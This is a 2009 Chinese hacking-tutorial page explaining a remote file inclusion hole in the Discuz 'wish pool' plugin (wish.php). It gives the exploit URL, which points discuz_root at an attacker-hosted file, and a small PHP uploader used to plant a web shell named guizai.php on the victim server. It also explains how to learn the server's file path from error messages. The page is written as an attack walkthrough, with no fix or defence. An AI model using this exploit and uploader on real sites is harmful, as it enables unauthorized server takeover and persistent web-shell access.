当前位置: 首页 > 图文教程 > 网络安全 > 黑客技术 > discuz许愿池插件远程包含漏洞

黑客技术
详解网站挂马的手段
教你利用个人主机进行网络入侵
教你解决QQ冻结、忘记密码问题
教你编写WEB蠕虫
发动钓鱼攻击有新招
网站如何更好的应对黑客攻击
远程控制软件“灰鸽子”是怎么飞的?
作为黑客必须要学会的知识
正向连接木马的原理
教你快速破解无线路由器密码的全过程
建立和删除系统隐藏帐号的方法
端口重定向Fpipe的用法
熟悉黑客入侵手段构建安全防线
IPC与Telnet入侵
Dos命令解密远程NT用户密码
详解sniffer的工作原理与防范措施
恶意软件冒充电影哈利波特与混血王子攻击网友
浏览器盗密木马疯狂盗取用户登录信息
Linux下破解windows密码最终秘籍
“史上最牛作文”竟成了病毒关键词

黑客技术 中的 discuz许愿池插件远程包含漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 130 ::
收藏到网摘: n/a

许愿池插件的wish.php文件出的问题:
require $discuz_root.'./include/discuzcode.func.php';
手工利用方法:
远程包含漏洞,变量discuz_root过滤不严,利用方法:
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。
这里xxxx.txt用CN.Tink的那个小马写个shell进去:
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
网站物理路径可以通过提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看错误提示信息,然后修改xxxx.txt中的路径即可。 guizai.php就是你上传的shell的名字。